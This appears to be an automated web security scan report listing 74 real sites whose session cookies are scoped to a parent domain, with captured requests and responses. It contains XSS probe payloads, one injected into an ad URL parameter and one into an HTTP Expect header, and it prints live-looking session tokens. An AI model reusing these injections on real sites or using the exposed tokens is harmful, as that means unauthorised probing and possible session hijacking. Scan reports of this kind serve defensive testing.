WNvJnNsPWVuJnRsPWphJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAIUDw8WAh8GBRdodHRwOi8vd3d3LmZpbmRpcmUuY29tL2RkAhUPDxYCHwYFLWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGUuYXNweGRkAhYPDxYCHwYFLWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1JlbnQuYXNweGRkAhcPDxYCHwYFKmh0dHA6Ly93d3cuZmluZGlyZS5jb20vQWR2ZXJ0aXNlckhvbWUuYXNweGRkAhgPDxYCHwYFJWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUmVzb3VyY2VzLmFzcHhkZAIZDw8WAh8GBSVodHRwOi8vd3d3LmZpbmRpcmUuY29tL0ludmVzdG9ycy5hc3B4ZGQCGg8PFgIfBgUiaHR0cDovL3d3dy5maW5kaXJlLmNvbS9TaWduSW4uYXNweGRkAhsPDxYCHwYFQ2h0dHA6Ly93d3cuZmluZGlyZS5jb20vU2lnbkluLmFzcHg/U2lnbk91dD10dXNwX0dldEFsbFBob3Rvc0J5SURydWVkZAIcDw8WAh8GBS9odHRwOi8vd3d3LmZpbmRpcmUuY29tL1NpZ25Jbi5hc3B4P1NpZ25PdXQ9dHJ1ZWRkAh0PDxYCHwYFK2h0dHA6Ly93d3cuZmluZGlyZS5jb20vUmVnaXN0ZXJPcHRpb25zLmFzcHhkZAIeDw8WAh8GBSZodHRwOi8vd3d3LmZpbmRpcmUuY29tL0FkdmVydGlzZXIuYXNweGRkAh8PDxYCHwYFKWh0dHA6Ly93d3cuZmluZGlyZS5jb20vVXNlck15QWNjb3VudC5hc3B4ZGQCBQ9kFghmDxYCHwAFQWh0dHA6Ly93d3cuZmluZGlyZS5jb20vVXNlckNvbnRyb2wvYWR2ZXJ0aXNlX3Byb3BlcnRpZXNfZnJlZS5odG1sFgYCAQ8PFgIfAwUeLi4vQWR2ZXJ0aXNlbWVudEltYWdlcy8xNjMuZ2lmZGQCAw8PFgIfBWhkZAIFDw8WAh8FaGRkAgEPFgIfAAUwaHR0cDovL3d3dy5iYW5rb2ZhbWVyaWNhLmNvbS9pbmRleC5jZm0/cGFnZT1jb3JwFgYCAQ8PFgIfBWhkZAIDDw8WAh8FaGRkAgUPDxYCHwMFHi4uL0FkdmVydGlzZW1lbnRJbWFnZXMvMjQ2LmdpZmRkAgIPFgIfAAUjaHR0cDovL3d3dy5jaXRpYmFuay5jb20vaXBiL2V1cm9wZS8WBgIBDw8WAh8FaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUeLi4vQWR2ZXJ0aXNlbWVudEltYWdlcy8xMTIuZ2lmZGQCAw8WAh8ABT9odHRwOi8vd3d3LmZpbmRpcmUuY29tL0FkdmVydGlzZXJfUHJvZmlsZS9Ib21lc092ZXJzZWFzLzMwLmh0bWwWBgIBDw8WAh8FaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUeLi4vQWR2ZXJ0aXNlbWVudEltYWdlcy8xMDkuZ2lmZGQCCQ9kFghmDxYCHwAFQmh0dHA6Ly93d3cuZmluZGlyZS5jb20vYWR2ZXJ0aXNlLXJlYWwtZXN0YXRlLXJlbGF0ZWQtYnVzaW5lc3MuaHRtbBYGAgEPDxYCHwMFHi4uL0FkdmVydGlzZW1lbnRJbWFnZXMvMTY0LmdpZmRkAgMPDxYCHwVoZGQCBQ8PFgIfBWhkZAIBDxYCHwAFM2h0dHA6Ly93d3cub2Zmc2hvcmUuaHNiYy5jb20vMS8yL2ludGVybmF0aW9uYWwvaG9tZRYGAgEPDxYCHwMFHi4uL0FkdmVydGlzZW1lbnRJbWFnZXMvMjUwLmdpZmRkAgMPDxYCHwVoZGQCBQ8PFgIfBWhkZAICDxYCHwAFL2h0dHA6Ly93d3cuYmFyY2xheXN3ZWFsdGguY29tL2ludGVybmF0aW9uYWwuaHRtFgYCAQ8PFgIfBWhkZAIDDw8WAh8FaGRkAgUPDxYCHwMFHi4uL0FkdmVydGlzZW1lbnRJbWFnZXMvMjQ4LmdpZmRkAgMPFgIfAAU4aHR0cDovL3d3dy5sbG95ZHN0c2Itb2Zmc2hvcmUuY29tL2ludGVybmF0aW9uYWwvYWNjb3VudC8WBgIBDw8WAh8FaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUeLi4vQWR2ZXJ0aXNlbWVudEltYWdlcy8yNTIuZ2lmZGQCCw9kFhQCAQ8PFgIfBgUjaHR0cDovL3d3dy5maW5kaXJlLmNvbS9BYm91dFVzLmFzcHhkZAIDDw8WAh8GBSVodHRwOi8vd3d3LmZpbmRpcmUuY29tL0NvbnRhY3R1cy5hc3B4ZGQCBQ8PFgIfBgUjaHR0cDovL3d3dy5maW5kaXJlLmNvbS9TaXRlbWFwLmFzcHhkZAIHDw8WAh8GBSFodHRwOi8vd3d3LmZpbmRpcmUuY29tL0xpbmtzLmFzcHhkZAIJDw8WAh8GBSZodHRwOi8vd3d3LmZpbmRpcmUuY29tL0FmZmlsaWF0ZXMuYXNweGRkAgsPDxYCHwYFLGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJpdmFjeVN0YXRlbWVudC5hc3B4ZGQCDQ8PFgIfBgUgaHR0cDovL3d3dy5maW5kaXJlLmNvbS9GYXFzLmFzcHhkZAIPDzwrAAkBAA8WBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCKGQWUGYPZBYGAgEPFgIfAAU3aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Bbmd1aWxsYS8xLzAvMBYCZg8VAghBbmd1aWxsYRFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIeBFRleHQFATdkZAIFDw8WAh8JBQhBbmd1aWxsYWRkAgEPZBYGAgEPFgIfAAVCaHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9BbnRpZ3VhX0FuZF9CYXJidWRhLzEvMC8wFgJmDxUCE0FudGlndWEgQW5kIEJhcmJ1ZGERUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzI1MGRkAgUPDxYCHwkFE0FudGlndWEgQW5kIEJhcmJ1ZGFkZAICD2QWBgIBDxYCHwAFNGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfQXJ1YmEvMS8wLzAWAmYPFQIFQXJ1YmERUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjEyZGQCBQ8PFgIfCQUFQXJ1YmFkZAIDD2QWBgIBDxYCHwAFOGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfQXVzdHJhbGlhLzEvMC8wFgJmDxUCCkF1c3RyYWxpYSARUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjEzZGQCBQ8PFgIfCQUKQXVzdHJhbGlhIGRkAgQPZBYGAgEPFgIfAAU2aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9BdXN0cmlhLzEvMC8wFgJmDxUCB0F1c3RyaWERUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjE0ZGQCBQ8PFgIfCQUHQXVzdHJpYWRkAgUPZBYGAgEPFgIfAAU2aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9CYWhhbWFzLzEvMC8wFgJmDxUCB0JhaGFtYXMRUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjE2ZGQCBQ8PFgIfCQUHQmFoYW1hc2RkAgYPZBYGAgEPFgIfAAU2aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9CYWhyYWluLzEvMC8wFgJmDxUCB0JhaHJhaW4RUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjE3ZGQCBQ8PFgIfCQUHQmFocmFpbmRkAgcPZBYGAgEPFgIfAAU1aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9CZWxpemUvMS8wLzAWAmYPFQIHQmVsaXplIBFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCMjJkZAIFDw8WAh8JBQdCZWxpemUgZGQCCA9kFgYCAQ8WAh8ABTdodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0NhbWJvZGlhLzEvMC8wFgJmDxUCCUNhbWJvZGlhIBFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCMzVkZAIFDw8WAh8JBQlDYW1ib2RpYSBkZAIJD2QWBgIBDxYCHwAFPWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfQ2FuYXJ5X0lzbGFuZHMvMS8wLzAWAmYPFQIOQ2FuYXJ5IElzbGFuZHMRUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzI0NGRkAgUPDxYCHwkFDkNhbmFyeSBJc2xhbmRzZGQCCg9kFgYCAQ8WAh8ABTlodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0NhcGVfVmVyZGUvMS8wLzAWAmYPFQIKQ2FwZSBWZXJkZRFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCMzhkZAIFDw8WAh8JBQpDYXBlIFZlcmRlZGQCCw9kFgYCAQ8WAh8ABThodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0NhcmliYmVhbi8xLzAvMBYCZg8VAglDYXJpYmJlYW4RUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzI0OGRkAgUPDxYCHwkFCUNhcmliYmVhbmRkAgwPZBYGAgEPFgIfAAU0aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9DaGlsZS8xLzAvMBYCZg8VAgVDaGlsZRFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCNDJkZAIFDw8WAh8JBQVDaGlsZWRkAg0PZBYGAgEPFgIfAAU3aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Db2xvbWJpYS8xLzAvMBYCZg8VAghDb2xvbWJpYRFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCNDRkZAIFDw8WAh8JBQhDb2xvbWJpYWRkAg4PZBYGAgEPFgIfAAU2aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Dcm9hdGlhLzEvMC8wFgJmDxUCB0Nyb2F0aWERUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjUwZGQCBQ8PFgIfCQUHQ3JvYXRpYWRkAg8PZBYGAgEPFgIfAAU9aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9DemVjaF9SZXB1YmxpYy8xLzAvMBYCZg8VAg9DemVjaCBSZXB1YmxpYyARUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAjUzZGQCBQ8PFgIfCQUPQ3plY2ggUmVwdWJsaWMgZGQCEA9kFgYCAQ8WAh8ABTVodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0dyZWVjZS8xLzAvMBYCZg8VAgdHcmVlY2UgEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQI4MGRkAgUPDxYCHwkFB0dyZWVjZSBkZAIRD2QWBgIBDxYCHwAFOGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfR3VhdGVtYWxhLzEvMC8wFgJmDxUCCUd1YXRlbWFsYRFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCODVkZAIFDw8WAh8JBQlHdWF0ZW1hbGFkZAISD2QWBgIBDxYCHwAFNGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfSW5kaWEvMS8wLzAWAmYPFQIGSW5kaWEgEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQI5NGRkAgUPDxYCHwkFBkluZGlhIGRkAhMPZBYGAgEPFgIfAAU4aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9JbmRvbmVzaWEvMS8wLzAWAmYPFQIKSW5kb25lc2lhIBFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUCOTVkZAIFDw8WAh8JBQpJbmRvbmVzaWEgZGQCFA9kFgYCAQ8WAh8ABTZodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0phbWFpY2EvMS8wLzAWAmYPFQIISmFtYWljYSARUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzEwMmRkAgUPDxYCHwkFCEphbWFpY2EgZGQCFQ9kFgYCAQ8WAh8ABTVodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX0pvcmRhbi8xLzAvMBYCZg8VAgZKb3JkYW4RUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzEwNWRkAgUPDxYCHwkFBkpvcmRhbmRkAhYPZBYGAgEPFgIfAAU5aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Nb3phbWJpcXVlLzEvMC8wFgJmDxUCCk1vemFtYmlxdWURUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzE0MmRkAgUPDxYCHwkFCk1vemFtYmlxdWVkZAIXD2QWBgIBDxYCHwAFOmh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfTmV3X1plYWxhbmQvMS8wLzAWAmYPFQIMTmV3IFplYWxhbmQgEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQMxNTBkZAIFDw8WAh8JBQxOZXcgWmVhbGFuZCBkZAIYD2QWBgIBDxYCHwAFNmh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfTmlnZXJpYS8xLzAvMBYCZg8VAgdOaWdlcmlhEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQMxNTNkZAIFDw8WAh8JBQdOaWdlcmlhZGQCGQ9kFgYCAQ8WAh8ABTNodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX09tYW4vMS8wLzAWAmYPFQIET21hbhFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMTU4ZGQCBQ8PFgIfCQUET21hbmRkAhoPZBYGAgEPFgIfAAU6aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9QdWVydG9fUmljby8xLzAvMBYCZg8VAgtQdWVydG8gUmljbxFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMTY5ZGQCBQ8PFgIfCQULUHVlcnRvIFJpY29kZAIbD2QWBgIBDxYCHwAFNmh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfUm9tYW5pYS8xLzAvMBYCZg8VAgdSb21hbmlhEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQMxNzJkZAIFDw8WAh8JBQdSb21hbmlhZGQCHA9kFgYCAQ8WAh8ABTVodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX1J1c3NpYS8xLzAvMBYCZg8VAgZSdXNzaWERUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzE3M2RkAgUPDxYCHwkFBlJ1c3NpYWRkAh0PZBYGAgEPFgIfAAVCaHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9TYWludF9LaXR0c18mX05ldmlzLzEvMC8wFgJmDxUCE1NhaW50IEtpdHRzICYgTmV2aXMRUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzI1NGRkAgUPDxYCHwkFE1NhaW50IEtpdHRzICYgTmV2aXNkZAIeD2QWBgIBDxYCHwAFRGh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfU2FpbnRfS2l0dHNfYW5kX05ldmlzLzEvMC8wFgJmDxUCFlNhaW50IEtpdHRzIGFuZCBOZXZpcyARUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzE3N2RkAgUPDxYCHwkFFlNhaW50IEtpdHRzIGFuZCBOZXZpcyBkZAIfD2QWBgIBDxYCHwAFTWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfU2FpbnRfVmluY2VudF8mX1RoZV9HcmVuYWRpbmVzLzEvMC8wFgJmDxUCHlNhaW50IFZpbmNlbnQgJiBUaGUgR3JlbmFkaW5lcxFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMjU1ZGQCBQ8PFgIfCQUeU2FpbnQgVmluY2VudCAmIFRoZSBHcmVuYWRpbmVzZGQCIA9kFgYCAQ8WAh8ABTtodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX1NhdWRpX0FyYWJpYS8xLzAvMBYCZg8VAg1TYXVkaSBBcmFiaWEgEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQMxODRkZAIFDw8WAh8JBQ1TYXVkaSBBcmFiaWEgZGQCIQ9kFgYCAQ8WAh8ABTZodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX1NlbmVnYWwvMS8wLzAWAmYPFQIHU2VuZWdhbBFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMTg1ZGQCBQ8PFgIfCQUHU2VuZWdhbGRkAiIPZBYGAgEPFgIfAAU7aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Tb3V0aF9BZnJpY2EvMS8wLzAWAmYPFQINU291dGggQWZyaWNhIBFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMTk4ZGQCBQ8PFgIfCQUNU291dGggQWZyaWNhIGRkAiMPZBYGAgEPFgIfAAU0aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9TcGFpbi8xLzAvMBYCZg8VAgVTcGFpbhFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMTk5ZGQCBQ8PFgIfCQUFU3BhaW5kZAIkD2QWBgIBDxYCHwAFNWh0dHA6Ly93d3cuZmluZGlyZS5jb20vUHJvcGVydHlfRm9yX1NhbGVfU3dlZGVuLzEvMC8wFgJmDxUCBlN3ZWRlbhFQcm9wZXJ0eSBGb3IgU2FsZWQCAw8PFgIfCQUDMjA1ZGQCBQ8PFgIfCQUGU3dlZGVuZGQCJQ9kFgYCAQ8WAh8ABTVodHRwOi8vd3d3LmZpbmRpcmUuY29tL1Byb3BlcnR5X0Zvcl9TYWxlX1R1cmtleS8xLzAvMBYCZg8VAgZUdXJrZXkRUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzIxOGRkAgUPDxYCHwkFBlR1cmtleWRkAiYPZBYGAgEPFgIfAAU2aHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9Va3JhaW5lLzEvMC8wFgJmDxUCCFVrcmFpbmUgEVByb3BlcnR5IEZvciBTYWxlZAIDDw8WAh8JBQMyMjNkZAIFDw8WAh8JBQhVa3JhaW5lIGRkAicPZBYGAgEPFgIfAAVSaHR0cDovL3d3dy5maW5kaXJlLmNvbS9Qcm9wZXJ0eV9Gb3JfU2FsZV9WaXJnaW5fSXNsYW5kc19vZl90aGVfVW5pdGVkX1N0YXRlcy8xLzAvMBYCZg8VAiRWaXJnaW4gSXNsYW5kcyBvZiB0aGUgVW5pdGVkIFN0YXRlcyARUHJvcGVydHkgRm9yIFNhbGVkAgMPDxYCHwkFAzIzM2RkAgUPDxYCHwkFJFZpcmdpbiBJc2xhbmRzIG9mIHRoZSBVbml0ZWQgU3RhdGVzIGRkAhEPPCsACQBkAhMPPCsACQBkZA==" />
...[SNIP]...

12. Cookie scoped to parent domain previous next
There are 74 instances of this issue:

http://www.atomiclearning.com/favicon.ico
http://www.thelaughtermovie.com/favicon.ico
http://www.ticketleap.net/favicon.ico
http://www.tireteam.com/favicon.ico
http://www.travelagentcentral.com/favicon.ico
http://www.we7.com/favicon.ico
http://a.collective-media.net/adj/cm.rev_lee/
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/j.ad
http://a.triggit.com/pxcwicm
http://ad.turn.com/server/pixel.htm
http://ads.adbrite.com/adserver/vdi/742697
http://ads.pointroll.com/PortalServe/
http://ads.specificmedia.com/serve/v=5
http://afe.specificclick.net/
http://ak1.abmr.net/is/k.collective-media.net
http://ak1.abmr.net/is/tag.contextweb.com
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://as.casalemedia.com/j
http://b.scorecardresearch.com/b
http://b.voicefive.com/b
http://bh.contextweb.com/bh/rtset
http://cms.quantserve.com/dpixel
http://cw-m.d.chango.com/m/cw
http://d.xp1.ru4.com/activity
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js
http://h.zedo.com/init/0.20843081758144966/g.gif
http://h.zedo.com/init/0.7280766281441555/g.gif
http://i.w55c.net/ping_match.gif
http://ib.adnxs.com/getuid
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/pxj
http://idpix.media6degrees.com/orbserv/hbpix
http://image2.pubmatic.com/AdServer/Pug
http://k.collective-media.net/cmadj/cm.rev_lee/
http://open.ad.yieldmanager.net/a1
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1
http://rs.gwallet.com/r1/pixel/x420r7209935
http://servedby.flashtalking.com/imp/3/15881
http://sync.mathtag.com/sync/img
http://tag.contextweb.com/TagPublish/getad.aspx
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/3358
http://www.3stepads.com/favicon.ico
http://www.bfcu.org/favicon.ico
http://www.bigtitcreampie.com/favicon.ico
http://www.bizsiteservice.com/favicon.ico
http://www.blackchristianpeoplemeet.com/favicon.ico
http://www.bloomu.edu/favicon.ico
http://www.cafe.com/favicon.ico
http://www.cariboucoffee.com/favicon.ico
http://www.eatdrinkbetter.com/favicon.ico
http://www.foodsaver.com/favicon.ico
http://www.gecu-ep.org/favicon.ico
http://www.hlj.com/favicon.ico
http://www.kjct8.com/favicon.ico
http://www.mailfromftd.com/favicon.ico
http://www.myeecu.org/favicon.ico
http://www.northstarmls.com/favicon.ico
http://www.petsupplies.com/favicon.ico
http://www.prosolutionpills.com/favicon.ico
http://www.quiltersclubofamerica.com/favicon.ico
http://www.superstreetonline.com/favicon.ico
http://www.twilightersanonymous.com/favicon.ico
http://www.whitepage.net/favicon.ico

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://www.atomiclearning.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.atomiclearning.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

platform_session=0684a7b9b10d110d27b33995013bac6e15572167; domain=atomiclearning.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atomiclearning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

12.2. http://www.thelaughtermovie.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thelaughtermovie.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSe8c893b16321029dc41c0b35727e8481=s6u0kegn135eal5qr7au8bg2h0; expires=Thu, 26-May-2011 14:11:03 GMT; path=/; domain=.thelaughtermovie.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thelaughtermovie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:37:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSe8c893b16321029dc41c0b35727e8481=s6u0kegn135eal5qr7au8bg2h0; expires=Thu, 26-May-2011 14:11:03 GMT; path=/; domain=.thelaughtermovie.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:37:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 6911
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="htt
...[SNIP]...

12.3. http://www.ticketleap.net/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ticketleap.net
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=nzdmcarmab1ud2in0guvyc45; domain=.ticketleap.net; path=/; HttpOnly
.ticketleap.net=-W7bwfD7D4Gu6ShpEWwZomZyjbpyLns1UnKPCDqKZXF_VGVLpr_zC9uMUyNhD6JlcUnQTBH0gjatFxV4tNqaWxFXpC3-v1PuZSuJdn-g7bvA4foDOubEwtVHgsW7xAAT0xYZ72SS_-7zU0JSpWd2JTF6vJs1; domain=.ticketleap.net; expires=Tue, 03-May-2011 11:26:27 GMT; path=/; HttpOnly

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketleap.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ticketleap.net=-W7bwfD7D4Gu6ShpEWwZomZyjbpyLns1UnKPCDqKZXF_VGVLpr_zC9uMUyNhD6JlcUnQTBH0gjatFxV4tNqaWxFXpC3-v1PuZSuJdn-g7bvA4foDOubEwtVHgsW7xAAT0xYZ72SS_-7zU0JSpWd2JTF6vJs1; domain=.ticketleap.net; expires=Tue, 03-May-2011 11:26:27 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=nzdmcarmab1ud2in0guvyc45; domain=.ticketleap.net; path=/; HttpOnly
X-Powered-By: ASP.NET
TL-Server: 2
Date: Tue, 03 May 2011 10:56:27 GMT
Content-Length: 2892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.
...[SNIP]...

12.4. http://www.tireteam.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tireteam.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=400de2bba6a2d859b9262db9a987ee67; path=/; domain=.tireteam.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

